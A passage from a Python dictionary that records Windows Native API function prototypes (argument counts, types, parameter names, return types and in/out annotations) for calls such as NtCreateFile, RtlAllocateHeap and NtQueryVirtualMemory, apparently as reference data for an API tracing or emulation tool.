'__OUT_opt']), 'RtlCompressBuffer': (8, ['ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG', 'ULONG', 'PULONG', 'PVOID'], ['CompressionFormat', 'SourceBuffer', 'SourceBufferLength', 'DestinationBuffer', 'DestinationBufferLength', 'Unknown', 'pDestinationSize', 'WorkspaceBuffer'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__IN', '__OUT', '__IN']), 'RtlDecompressBuffer': (6, ['ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['CompressionFormat', 'DestinationBuffer', 'DestinationBufferLength', 'SourceBuffer', 'SourceBufferLength', 'pDestinationSize'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN', '__OUT']), 'RtlGetCompressionWorkSpaceSize': (3, ['ULONG', 'PULONG', 'PULONG'], ['CompressionFormat', 'pNeededBufferSize', 'pUnknown'], 'NTSTATUS', ['__IN', '__OUT', '__OUT']), 'DbgPrint': (1, ['LPCSTR'], ['Format'], 'NTSTATUS', ['__IN']), 'NtSystemDebugControl': (6, ['SYSDBG_COMMAND', 'PVOID', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['Command', 'InputBuffer', 'InputBufferLength', 'OutputBuffer', 'OutputBufferLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN', '__OUT_opt', '__IN', '__OUT_opt']), 'RtlCaptureStackBackTrace': (4, ['ULONG', 'ULONG', 'PVOID', 'PULONG'], ['FramesToSkip', 'FramesToCapture', '*BackTrace', 'BackTraceHash'], 'USHORT', ['__IN', '__IN', '__OUT', '__OUT']), 'RtlGetCallersAddress': (2, ['PVOID', 'PVOID'], ['*CallersAddress', '*CallersCaller'], 'PVOID', ['__OUT', '__OUT']), 'NtDisplayString': (1, ['PUNICODE_STRING'], ['String'], 'NTSTATUS', ['__IN']), 'NtRaiseException': (3, ['PEXCEPTION_RECORD', 'PCONTEXT', 'BOOLEAN'], ['ExceptionRecord', 'ThreadContext', 'HandleException'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtRaiseHardError': (6, ['NTSTATUS', 'ULONG', 'PUNICODE_STRING', 'PVOID', 'HARDERROR_RESPONSE_OPTION', 'PHARDERROR_RESPONSE'], ['ErrorStatus', 'NumberOfParameters', 'UnicodeStringParameterMask', '*Parameters', 'ResponseOption', 'Response'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN', '__IN', '__OUT']), 'NtSetDefaultHardErrorPort': (1, ['HANDLE'], ['PortHandle'], 'NTSTATUS', ['__IN']), 'NtQuerySystemEnvironmentValue': (4, ['PUNICODE_STRING', 'PWCHAR', 'ULONG', 'PULONG'], ['VariableName', 'Value', 'ValueBufferLength', 'RequiredLength'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__OUT_opt']), 'NtSetSystemEnvironmentValue': (2, ['PUNICODE_STRING', 'PUNICODE_STRING'], ['VariableName', 'Value'], 'NTSTATUS', ['__IN', '__IN']), 'RtlCreateEnvironment': (2, ['BOOLEAN', 'PVOID'], ['Inherit', '*Environment'], 'NTSTATUS', ['__IN', '__OUT']), 'RtlDestroyEnvironment': (1, ['PVOID'], ['Environment'], 'VOID', ['__IN']), 'RtlExpandEnvironmentStrings_U': (4, ['PVOID', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PULONG'], ['Environment', 'SourceString', 'DestinationString', 'DestinationBufferLength'], 'NTSTATUS', ['__IN_opt', '__IN', '__OUT', '__OUT_opt']), 'RtlQueryEnvironmentVariable_U': (3, ['PVOID', 'PUNICODE_STRING', 'PUNICODE_STRING'], ['Environment', 'VariableName', 'VariableValue'], 'NTSTATUS', ['__IN_opt', '__IN', '__OUT']), 'RtlSetCurrentEnvironment': (2, ['PVOID', 'PVOID'], ['NewEnvironment', '*OldEnvironment'], 'VOID', ['__IN', '__OUT_opt']), 'RtlSetEnvironmentVariable': (3, ['PVOID', 'PUNICODE_STRING', 'PUNICODE_STRING'], ['*Environment', 'VariableName', 'VariableValue'], 'NTSTATUS', ['__IN_OUT_opt', '__IN', '__IN']), 'LdrGetDllHandle': (4, ['PWORD', 'PVOID', 'PUNICODE_STRING', 'PHANDLE'], ['pwPath', 'Unused', 'ModuleFileName', 'pHModule'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN', '__OUT']), 'LdrGetProcedureAddress': (4, ['HMODULE', 'PANSI_STRING', 'WORD', 'PVOID'], ['ModuleHandle', 'FunctionName', 'Oridinal', '*FunctionAddress'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__OUT']), 'LdrLoadDll': (4, ['PWCHAR', 'ULONG', 'PUNICODE_STRING', 'PHANDLE'], ['PathToFile', 'Flags', 'ModuleFileName', 'ModuleHandle'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN', '__OUT']), 'LdrQueryProcessModuleInformation': (3, ['PSYSTEM_MODULE_INFORMATION', 'ULONG', 'PULONG'], ['SystemModuleInformationBuffer', 'BufferSize', 'RequiredSize'], 'NTSTATUS', ['__OUT', '__IN', '__OUT_opt']), 'LdrShutdownProcess': (0, [], [], 'VOID', []), 'LdrShutdownThread': (0, [], [], 'VOID', []), 'LdrUnloadDll': (1, ['HANDLE'], ['ModuleHandle'], 'NTSTATUS', ['__IN']), 'NtLoadDriver': (1, ['PUNICODE_STRING'], ['DriverServiceName'], 'NTSTATUS', ['__IN']), 'NtUnloadDriver': (1, ['PUNICODE_STRING'], ['DriverServiceName'], 'NTSTATUS', ['__IN']), 'RtlImageNtHeader': (1, ['PVOID'], ['ModuleAddress'], 'PIMAGE_NT_HEADERS', ['__IN']), 'RtlImageRvaToVa': (4, ['PIMAGE_NT_HEADERS', 'PVOID', 'ULONG', 'PIMAGE_SECTION_HEADER'], ['NtHeaders', 'ModuleBase', 'Rva', 'pLastSection'], 'PVOID', ['__IN', '__IN', '__IN', '__IN_OUT_opt']), 'NtFlushWriteBuffer': (0, [], [], 'NTSTATUS', []), 'NtShutdownSystem': (1, ['SHUTDOWN_ACTION'], ['Action'], 'NTSTATUS', ['__IN']), 'NtQueryDefaultLocale': (2, ['BOOLEAN', 'PLCID'], ['UserProfile', 'DefaultLocaleId'], 'NTSTATUS', ['__IN', '__OUT']), 'NtSetDefaultLocale': (2, ['BOOLEAN', 'LCID'], ['UserProfile', 'DefaultLocaleId'], 'NTSTATUS', ['__IN', '__IN']), 'RtlAllocateHeap': (3, ['PVOID', 'ULONG', 'ULONG'], ['HeapHandle', 'Flags', 'Size'], 'PVOID', ['__IN', '__IN', '__IN']), 'RtlCompactHeap': (2, ['HANDLE', 'ULONG'], ['HeapHandle', 'Flags'], 'ULONG', ['__IN', '__IN']), 'RtlCreateHeap': (6, ['ULONG', 'PVOID', 'ULONG', 'ULONG', 'BOOLEAN', 'PRTL_HEAP_DEFINITION'], ['Flags', 'Base', 'Reserve', 'Commit', 'Lock', 'RtlHeapParams'], 'PVOID', ['__IN', '__IN_opt', '__IN_opt', '__IN', '__IN_opt', '__IN_opt']), 'RtlDestroyHeap': (1, ['PVOID'], ['HeapHandle'], 'NTSTATUS', ['__IN']), 'RtlEnumProcessHeaps': (2, ['PHEAP_ENUMERATION_ROUTINE', 'PVOID'], ['HeapEnumerationRoutine', 'Param'], 'NTSTATUS', ['__IN', '__IN_opt']), 'RtlFreeHeap': (3, ['PVOID', 'ULONG', 'PVOID'], ['HeapHandle', 'Flags', 'MemoryPointer'], 'BOOLEAN', ['__IN', '__IN_opt', '__IN']), 'RtlGetProcessHeaps': (2, ['ULONG', 'PVOID'], ['MaxNumberOfHeaps', '*HeapArray'], 'ULONG', ['__IN', '__OUT']), 'RtlLockHeap': (1, ['PVOID'], ['HeapHandle'], 'BOOLEAN', ['__IN']), 'RtlProtectHeap': (2, ['PVOID', 'BOOLEAN'], ['HeapHandle', 'Protect'], 'PVOID', ['__IN', '__IN']), 'RtlReAllocateHeap': (4, ['PVOID', 'ULONG', 'PVOID', 'ULONG'], ['HeapHandle', 'Flags', 'MemoryPointer', 'Size'], 'PVOID', ['__IN', '__IN', '__IN', '__IN']), 'RtlSizeHeap': (3, ['PVOID', 'ULONG', 'PVOID'], ['HeapHandle', 'Flags', 'MemoryPointer'], 'ULONG', ['__IN', '__IN', '__IN']), 'RtlUnlockHeap': (1, ['PVOID'], ['HeapHandle'], 'BOOLEAN', ['__IN']), 'RtlValidateHeap': (3, ['PVOID', 'ULONG', 'PVOID'], ['HeapHandle', 'Flags', 'AddressToValidate'], 'BOOLEAN', ['__IN', '__IN', '__IN_opt']), 'RtlValidateProcessHeaps': (0, [], [], 'BOOLEAN', []), 'RtlWalkHeap': (2, ['PVOID', 'LPPROCESS_HEAP_ENTRY'], ['HeapHandle', 'ProcessHeapEntry'], 'NTSTATUS', ['__IN', '__IN_OUT']), 'NtAllocateVirtualMemory': (6, ['HANDLE', 'PVOID', 'ULONG', 'PULONG', 'ULONG', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'ZeroBits', 'RegionSize', 'AllocationType', 'Protect'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN', '__IN_OUT', '__IN', '__IN']), 'NtFlushVirtualMemory': (4, ['HANDLE', 'PVOID', 'PULONG', 'PIO_STATUS_BLOCK'], ['ProcessHandle', '*BaseAddress', 'NumberOfBytesToFlush', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN_OUT', '__OUT']), 'NtFreeVirtualMemory': (4, ['HANDLE', 'PVOID', 'PULONG', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'RegionSize', 'FreeType'], 'NTSTATUS', ['__IN', '__IN', '__IN_OUT', '__IN']), 'NtLockVirtualMemory': (4, ['HANDLE', 'PVOID', 'PULONG', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'NumberOfBytesToLock', 'LockOption'], 'NTSTATUS', ['__IN', '__IN', '__IN_OUT', '__IN']), 'NtProtectVirtualMemory': (5, ['HANDLE', 'PVOID', 'PULONG', 'ULONG', 'PULONG'], ['ProcessHandle', '*BaseAddress', 'NumberOfBytesToProtect', 'NewAccessProtection', 'OldAccessProtection'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN_OUT', '__IN', '__OUT']), 'NtQueryVirtualMemory': (6, ['HANDLE', 'PVOID', 'MEMORY_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['ProcessHandle', 'BaseAddress', 'MemoryInformationClass', 'Buffer', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtReadVirtualMemory': (5, ['HANDLE', 'PVOID', 'PVOID', 'ULONG', 'PULONG'], ['ProcessHandle', 'BaseAddress', 'Buffer', 'NumberOfBytesToRead', 'NumberOfBytesReaded'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtUnlockVirtualMemory': (4, ['HANDLE', 'PVOID', 'PULONG', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'NumberOfBytesToUnlock', 'LockType'], 'NTSTATUS', ['__IN', '__IN', '__IN_OUT', '__IN']), 'NtWriteVirtualMemory': (5, ['HANDLE', 'PVOID', 'PVOID', 'ULONG', 'PULONG'], ['ProcessHandle', 'BaseAddress', 'Buffer', 'NumberOfBytesToWrite', 'NumberOfBytesWritten'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT_opt']), 'NtQuerySecurityObject': (5, ['HANDLE', 'SECURITY_INFORMATION', 'PSECURITY_DESCRIPTOR', 'ULONG', 'PULONG'], ['ObjectHandle', 'SecurityInformationClass', 'DescriptorBuffer', 'DescriptorBufferLength', 'RequiredLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtSetSecurityObject': (3, ['HANDLE', 'SECURITY_INFORMATION', 'PSECURITY_DESCRIPTOR'], ['ObjectHandle', 'SecurityInformationClass', 'DescriptorBuffer'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtDuplicateObject': (7, ['HANDLE', 'PHANDLE', 'HANDLE', 'PHANDLE', 'ACCESS_MASK', 'BOOLEAN', 'ULONG'], ['SourceProcessHandle', 'SourceHandle', 'TargetProcessHandle', 'TargetHandle', 'DesiredAccess', 'InheritHandle', 'Options'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN_opt', '__IN', '__IN']), 'NtMakeTemporaryObject': (1, ['HANDLE'], ['ObjectHandle'], 'NTSTATUS', ['__IN']), 'NtQueryObject': (5, ['HANDLE', 'OBJECT_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['ObjectHandle', 'ObjectInformationClass', 'ObjectInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtSetInformationObject': (4, ['HANDLE', 'OBJECT_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['ObjectHandle', 'ObjectInformationClass', 'ObjectInformation', 'Length'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSignalAndWaitForSingleObject': (4, ['HANDLE', 'HANDLE', 'BOOLEAN', 'PLARGE_INTEGER'], ['ObjectToSignal', 'WaitableObject', 'Alertable', 'Time'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt']), 'NtWaitForMultipleObjects': (5, ['ULONG', 'PHANDLE', 'OBJECT_WAIT_TYPE', 'BOOLEAN', 'PLARGE_INTEGER'], ['ObjectCount', 'ObjectsArray', 'WaitType', 'Alertable', 'TimeOut'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN_opt']), 'NtWaitForSingleObject': (3, ['HANDLE', 'BOOLEAN', 'PLARGE_INTEGER'], ['ObjectHandle', 'Alertable', 'TimeOut'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt']), 'NtCreateDebugObject': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'BOOLEAN'], ['DebugObjectHandle', 'DesiredAccess', 'ObjectAttributes', 'KillProcessOnExit'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtDebugActiveProcess': (2, ['HANDLE', 'HANDLE'], ['ProcessHandle', 'DebugObjectHandle'], 'NTSTATUS', ['__IN', '__IN']), 'NtRemoveProcessDebug': (2, ['HANDLE', 'HANDLE'], ['ProcessHandle', 'DebugObjectHandle'], 'NTSTATUS', ['__IN', '__IN']), 'NtCreateDirectoryObject': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['DirectoryHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtOpenDirectoryObject': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['DirectoryObjectHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQueryDirectoryObject': (7, ['HANDLE', 'POBJDIR_INFORMATION', 'ULONG', 'BOOLEAN', 'BOOLEAN', 'PULONG', 'PULONG'], ['DirectoryObjectHandle', 'DirObjInformation', 'BufferLength', 'GetNextIndex', 'IgnoreInputIndex', 'ObjectIndex', 'DataWritten'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN', '__IN_OUT', '__OUT_opt']), 'NtClearEvent': (1, ['HANDLE'], ['EventHandle'], 'NTSTATUS', ['__IN']), 'NtCreateEvent': (5, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'EVENT_TYPE', 'BOOLEAN'], ['EventHandle', 'DesiredAccess', 'ObjectAttributes', 'EventType', 'InitialState'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN']), 'NtOpenEvent': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['EventHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtPulseEvent': (2, ['HANDLE', 'PLONG'], ['EventHandle', 'PreviousState'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtQueryEvent': (5, ['HANDLE', 'EVENT_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['EventHandle', 'EventInformationClass', 'EventInformation', 'EventInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtResetEvent': (2, ['HANDLE', 'PLONG'], ['EventHandle', 'PreviousState'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtSetEvent': (2, ['HANDLE', 'PLONG'], ['EventHandle', 'PreviousState'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtSetEventBoostPriority': (1, ['HANDLE'], ['EventHandle'], 'NTSTATUS', ['__IN']), 'NtCreateEventPair': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['EventPairHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt']), 'NtOpenEventPair': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['EventPairHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtSetHighEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtSetHighWaitLowEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtSetHighWaitLowThread': (0, [], [], 'NTSTATUS', []), 'NtSetLowEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtSetLowWaitHighEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtSetLowWaitHighThread': (0, [], [], 'NTSTATUS', []), 'NtWaitHighEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtWaitLowEventPair': (1, ['HANDLE'], ['EventPairHandle'], 'NTSTATUS', ['__IN']), 'NtCancelIoFile': (2, ['HANDLE', 'PIO_STATUS_BLOCK'], ['FileHandle', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__OUT']), 'NtCreateFile': (11, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'ULONG', 'ULONG', 'ULONG', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'AllocationSize', 'FileAttributes', 'ShareAccess', 'CreateDisposition', 'CreateOptions', 'EaBuffer', 'EaLength'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__IN_opt', '__IN']), 'NtCreateMailslotFile': (8, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'ULONG', 'ULONG', 'ULONG', 'PLARGE_INTEGER'], ['MailslotFileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'CreateOptions', 'MailslotQuota', 'MaxMessageSize', 'ReadTimeOut'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN', '__IN', '__IN', '__IN']), 'NtCreateNamedPipeFile': (14, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'ULONG', 'ULONG', 'ULONG', 'BOOLEAN', 'BOOLEAN', 'BOOLEAN', 'ULONG', 'ULONG', 'ULONG', 'PLARGE_INTEGER'], ['NamedPipeFileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'ShareAccess', 'CreateDisposition', 'CreateOptions', 'WriteModeMessage', 'ReadModeMessage', 'NonBlocking', 'MaxInstances', 'InBufferSize', 'OutBufferSize', 'DefaultTimeOut'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtCreatePagingFile': (4, ['PUNICODE_STRING', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'PLARGE_INTEGER'], ['PageFileName', 'MiniumSize', 'MaxiumSize', 'ActualSize'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT_opt']), 'NtDeleteFile': (1, ['POBJECT_ATTRIBUTES'], ['ObjectAttributes'], 'NTSTATUS', ['__IN']), 'NtDeviceIoControlFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'IoControlCode', 'InputBuffer', 'InputBufferLength', 'OutputBuffer', 'OutputBufferLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN_opt', '__IN', '__OUT_opt', '__IN']), 'NtFlushBuffersFile': (2, ['HANDLE', 'PIO_STATUS_BLOCK'], ['FileHandle', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__OUT']), 'NtFsControlFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FsControlCode', 'InputBuffer', 'InputBufferLength', 'OutputBuffer', 'OutputBufferLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN_opt', '__IN', '__OUT_opt', '__IN']), 'NtLockFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'PULONG', 'BOOLEAN', 'BOOLEAN'], ['FileHandle', 'LockGrantedEvent', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'ByteOffset', 'Length', 'Key', 'ReturnImmediately', 'ExclusiveLock'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtNotifyChangeDirectoryFile': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'ULONG', 'BOOLEAN'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'BufferSize', 'CompletionFilter', 'WatchTree'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN', '__IN']), 'NtOpenFile': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'ULONG', 'ULONG'], ['FileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'ShareAccess', 'OpenOptions'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN', '__IN']), 'NtQueryAttributesFile': (2, ['POBJECT_ATTRIBUTES', 'PFILE_BASIC_INFORMATION'], ['ObjectAttributes', 'FileAttributes'], 'NTSTATUS', ['__IN', '__OUT']), 'NtQueryDirectoryFile': (11, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS', 'BOOLEAN', 'PUNICODE_STRING', 'BOOLEAN'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass', 'ReturnSingleEntry', 'FileMask', 'RestartScan'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN']), 'NtQueryEaFile': (9, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'BOOLEAN', 'PVOID', 'ULONG', 'PULONG', 'BOOLEAN'], ['FileHandle', 'IoStatusBlock', 'Buffer', 'Length', 'ReturnSingleEntry', 'EaList', 'EaListLength', 'EaIndex', 'RestartScan'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN', '__IN_opt', '__IN', '__IN_opt', '__IN']), 'NtQueryFullAttributesFile': (2, ['POBJECT_ATTRIBUTES', 'PVOID'], ['ObjectAttributes', 'Attributes'], 'NTSTATUS', ['__IN', '__OUT']), 'NtQueryInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN']), 'NtQueryOleDirectoryFile': (11, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS', 'BOOLEAN', 'PUNICODE_STRING', 'BOOLEAN'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass', 'ReturnSingleEntry', 'FileMask', 'RestartScan'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN']), 'NtQueryVolumeInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FS_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileSystemInformation', 'Length', 'FileSystemInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN']), 'NtReadFile': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN_opt', '__IN_opt']), 'NtReadFileScatter': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'FILE_SEGMENT_ELEMENT', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'SegmentArray', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN', '__IN_opt']), 'NtSetEaFile': (4, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG'], ['FileHandle', 'IoStatusBlock', 'EaBuffer', 'EaBufferSize'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN']), 'NtSetInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtSetVolumeInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FS_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileSystemInformation', 'Length', 'FileSystemInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtUnlockFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'IoStatusBlock', 'ByteOffset', 'Length', 'Key'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtWriteFile': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN_opt', '__IN_opt']), 'NtWriteFileGather': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'FILE_SEGMENT_ELEMENT', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'SegmentArray', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN', '__IN_opt']), 'NtCreateIoCompletion': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG'], ['IoCompletionHandle', 'DesiredAccess', 'ObjectAttributes', 'NumberOfConcurrentThreads'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtOpenIoCompletion': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['IoCompletionHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 